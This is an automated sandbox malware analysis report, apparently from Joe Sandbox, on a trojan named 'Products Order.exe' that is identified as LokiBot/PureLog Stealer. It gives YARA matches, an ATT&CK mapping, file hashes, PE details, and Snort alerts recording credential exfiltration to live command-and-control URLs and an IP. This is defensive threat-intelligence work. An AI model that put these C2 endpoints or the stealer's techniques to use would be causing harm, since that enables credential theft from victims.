Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: Products Order.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Products Order.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Products Order.exe	100%	Avira	TR/Dropper.MSIL.Gen
Products Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://kbfvzoboss.bid/alien/fre.php	100%	Sophos S4	malware callhome uri
45.90.57.51/big/five/fre.php	100%	Sophos S4	malware callhome uri
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	Sophos S4	malware callhome uri
http://45.90.57.51/big/five/fre.php	100%	Sophos S4	malware callhome uri
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	Sophos S4	malware callhome uri
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	Sophos S4	malware callhome uri
http://www.ibsensoftware.com/	0%	URL Reputation	safe
45.90.57.51/big/five/fre.php	100%	Avira URL Cloud	malware
http://45.90.57.51/big/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware Sophos S4: malware callhome uri	unknown
45.90.57.51/big/five/fre.php	true	Sophos S4: malware callhome uri Avira URL Cloud: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware Sophos S4: malware callhome uri	unknown
http://45.90.57.51/big/five/fre.php	true	Sophos S4: malware callhome uri Avira URL Cloud: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware Sophos S4: malware callhome uri	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware Sophos S4: malware callhome uri	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.90.57.51	unknown	Bulgaria		204957	GREENFLOID-ASUA	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1442315
Start date and time:	2024-05-16 00:36:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Products Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 39 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Products Order.exe

Simulations

Behavior and APIs

Time	Type	Description
00:36:54	API Interceptor	60x Sleep call for process: aspnet_compiler.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GREENFLOID-ASUA	https://github.com/oLDschollBozz/BF2042Galaxy	Get hash	malicious	PureLog Stealer, zgRAT	Browse	91.90.195.152
	SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll	Get hash	malicious	CobaltStrike	Browse	45.90.59.193
	History123456.zip	Get hash	malicious	Unknown	Browse	195.123.246.26
	YxcXefg5QE.exe	Get hash	malicious	Unknown	Browse	82.118.21.69
	YxcXefg5QE.exe	Get hash	malicious	Unknown	Browse	82.118.21.69
	nDoc_032056193.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	82.118.21.69
	Doc_1009675287pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	82.118.21.69
	helper.exe	Get hash	malicious	AZORult++	Browse	45.90.58.1
	helper(1).exe	Get hash	malicious	AZORult++	Browse	45.90.58.1
	helper.exe	Get hash	malicious	AZORult++	Browse	45.90.58.1

Process:	C:\Users\user\Desktop\Products Order.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.10191984815915
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Products Order.exe
File size:	775'680 bytes
MD5:	ab09f11ddb556069549717cc1f37fdc1
SHA1:	e4cba5e88d12df5f9b0eb1dab978b48d63f6b57b
SHA256:	6946d0d3322995d1c4a8f407b8a627e37644dcc4ddef07b97167f9a4e57b0ee1
SHA512:	c85c518d4216cb9316f96d70240093f4193e5817d761623371f9d6cb011c6d2cb2b8c78162bde04e46baa3add624bdb87c9a506eff97326a34b6a271192f34ba
SSDEEP:	3072:dYbDPtd2epEFbMkbNZG46Xz3kFE0bFd+m0de2fcRMBLEFx11Hiv2MN+lEEUMIbhp:2BjkbNNhNHG+96+ixbcdWtoBr
TLSH:	C2F400BB286A51D9F261AD386B7CBC768219E7FD25F50C730CFE051680125F18BED226
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uDf.................8..........^V... ...`....@.. ....................... ............@................................

File Icon


Icon Hash:	0008102000000182

Static PE Info

General

Entrypoint:	0x49565e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6644758A [Wed May 15 08:42:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x95610	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0x29840	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x93664	0x93800	4b55cde56a5ac233c607650303daef71	False	0.22714181673728814	data	4.029019241902378	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0x29840	0x29a00	9dd9b2e80aaafd30312fe8498c9f8ded	False	0.05544998123123123	data	2.5037814895104686	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	e04dff95c3411ea045ef5ff3e7f942bd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x962e0	0x10f1	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	0.6822688494350934
RT_ICON	0x973d4	0x7e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.7902028698664028
RT_ICON	0x97bbc	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.01634035253756063
RT_ICON	0xa83e4	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.02112676056338028
RT_ICON	0xb188c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.027634011090573014
RT_ICON	0xb6d14	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.02119744922059518
RT_ICON	0xbaf3c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.04035269709543569
RT_ICON	0xbd4e4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.05065666041275797
RT_ICON	0xbe58c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.10081967213114754
RT_ICON	0xbef14	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.12677304964539007
RT_GROUP_ICON	0xbf37c	0x92	data	0.7054794520547946
RT_VERSION	0xbf410	0x244	data	0.46551724137931033
RT_MANIFEST	0xbf654	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/16/24-00:37:53.617485	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49744	45.90.57.51	192.168.2.5
05/16/24-00:38:12.750490	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.5	45.90.57.51
05/16/24-00:38:35.693093	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49766	80	192.168.2.5	45.90.57.51
05/16/24-00:37:01.238713	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49709	45.90.57.51	192.168.2.5
05/16/24-00:37:00.746100	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49709	80	192.168.2.5	45.90.57.51
05/16/24-00:38:08.955748	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.5	45.90.57.51
05/16/24-00:38:37.577907	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.5	45.90.57.51
05/16/24-00:36:54.264582	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49705	80	192.168.2.5	45.90.57.51
05/16/24-00:37:43.623424	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.5	45.90.57.51
05/16/24-00:37:00.746100	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49709	80	192.168.2.5	45.90.57.51
05/16/24-00:36:57.478820	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49707	45.90.57.51	192.168.2.5
05/16/24-00:37:07.254938	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49712	80	192.168.2.5	45.90.57.51
05/16/24-00:37:41.744488	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.5	45.90.57.51
05/16/24-00:36:55.076784	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49706	80	192.168.2.5	45.90.57.51
05/16/24-00:38:50.123310	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.5	45.90.57.51
05/16/24-00:37:07.254938	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49712	80	192.168.2.5	45.90.57.51
05/16/24-00:37:41.744488	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.5	45.90.57.51
05/16/24-00:37:12.990169	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.5	45.90.57.51
05/16/24-00:37:33.315004	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49733	80	192.168.2.5	45.90.57.51
05/16/24-00:38:01.356159	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49748	80	192.168.2.5	45.90.57.51
05/16/24-00:38:01.857131	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49748	45.90.57.51	192.168.2.5
05/16/24-00:38:07.071740	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49751	80	192.168.2.5	45.90.57.51
05/16/24-00:38:50.123310	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.5	45.90.57.51
05/16/24-00:38:43.272420	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.5	45.90.57.51
05/16/24-00:38:12.750490	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.5	45.90.57.51
05/16/24-00:37:23.884685	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.5	45.90.57.51
05/16/24-00:37:57.604255	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49746	45.90.57.51	192.168.2.5
05/16/24-00:36:54.264582	TCP	2025381	ET TROJAN LokiBot Checkin	49705	80	192.168.2.5	45.90.57.51
05/16/24-00:37:47.955066	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49740	45.90.57.51	192.168.2.5
05/16/24-00:37:49.847441	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49742	45.90.57.51	192.168.2.5
05/16/24-00:38:03.239293	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.5	45.90.57.51
05/16/24-00:37:55.010656	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.5	45.90.57.51
05/16/24-00:37:29.556038	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.5	45.90.57.51
05/16/24-00:37:45.530428	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.5	45.90.57.51
05/16/24-00:37:11.067189	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.5	45.90.57.51
05/16/24-00:38:35.693093	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.5	45.90.57.51
05/16/24-00:38:17.603710	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.5	45.90.57.51
05/16/24-00:37:09.170149	TCP	2025381	ET TROJAN LokiBot Checkin	49713	80	192.168.2.5	45.90.57.51
05/16/24-00:38:01.356159	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.5	45.90.57.51
05/16/24-00:37:35.199755	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.5	45.90.57.51
05/16/24-00:38:27.085627	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.5	45.90.57.51
05/16/24-00:38:28.951650	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.5	45.90.57.51
05/16/24-00:38:19.541569	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49758	80	192.168.2.5	45.90.57.51
05/16/24-00:37:20.628600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.5	45.90.57.51
05/16/24-00:37:47.452852	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.5	45.90.57.51
05/16/24-00:38:28.951650	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.5	45.90.57.51
05/16/24-00:37:20.628600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.5	45.90.57.51
05/16/24-00:37:47.452852	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.5	45.90.57.51
05/16/24-00:36:52.383820	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49704	80	192.168.2.5	45.90.57.51
05/16/24-00:36:52.383820	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49704	80	192.168.2.5	45.90.57.51
05/16/24-00:37:55.010656	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.5	45.90.57.51
05/16/24-00:37:11.067189	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.5	45.90.57.51
05/16/24-00:37:12.990169	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49723	80	192.168.2.5	45.90.57.51
05/16/24-00:37:25.750611	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.5	45.90.57.51
05/16/24-00:38:11.363615	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49753	45.90.57.51	192.168.2.5
05/16/24-00:37:37.637986	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49735	45.90.57.51	192.168.2.5
05/16/24-00:37:25.750611	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.5	45.90.57.51
05/16/24-00:37:29.556038	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.5	45.90.57.51
05/16/24-00:37:57.099162	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49746	80	192.168.2.5	45.90.57.51
05/16/24-00:37:37.130221	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.5	45.90.57.51
05/16/24-00:37:16.803035	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49725	80	192.168.2.5	45.90.57.51
05/16/24-00:37:59.470457	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.5	45.90.57.51
05/16/24-00:38:52.514469	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49774	45.90.57.51	192.168.2.5
05/16/24-00:38:53.898131	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.5	45.90.57.51
05/16/24-00:37:07.768110	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49712	45.90.57.51	192.168.2.5
05/16/24-00:38:43.763044	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49770	45.90.57.51	192.168.2.5
05/16/24-00:38:41.388891	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.5	45.90.57.51
05/16/24-00:38:52.000180	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49774	80	192.168.2.5	45.90.57.51
05/16/24-00:38:19.541569	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.5	45.90.57.51
05/16/24-00:37:53.120055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.5	45.90.57.51
05/16/24-00:38:05.193094	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.5	45.90.57.51
05/16/24-00:38:18.130281	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49757	45.90.57.51	192.168.2.5
05/16/24-00:38:30.894418	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.5	45.90.57.51
05/16/24-00:37:37.130221	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.5	45.90.57.51
